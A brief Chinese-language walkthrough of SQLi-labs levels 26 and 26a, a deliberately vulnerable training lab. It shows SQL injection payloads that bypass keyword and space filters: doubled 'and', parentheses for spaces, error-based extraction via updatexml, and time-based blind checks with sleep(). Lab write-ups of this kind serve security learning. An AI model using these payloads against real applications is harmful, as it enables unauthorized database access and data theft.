less26

1.我們打開這一關來看一下，他提示我們空格和其他一些什么都被過濾了

2.我們來嘗試繞過,按照之前的做法，可以看到閉合方式為單引號，并且過濾了--與#

3.我們來嘗試繞過一下，發現可以以下的方式繞過，空格用（）代替

?id=1' aandnd(updatexml(1,concat(1,(select(database()))),1)) aandnd '1'='1

4.既然報錯注入這樣可以，那么就按這樣的方式往出做就可以

less26a

1.這一關與上一關的區別是這一關閉合方式為 ') ,另外可以使用時間盲注來判斷

id=1')anandd(if(length(database())>7,sleep(3),1))anandd('1')=('1
id=1')anandd(if(length(database())>8,sleep(3),1))anandd('1')=('1

2.剩余的內容可以接著利用時間盲注的方式往下做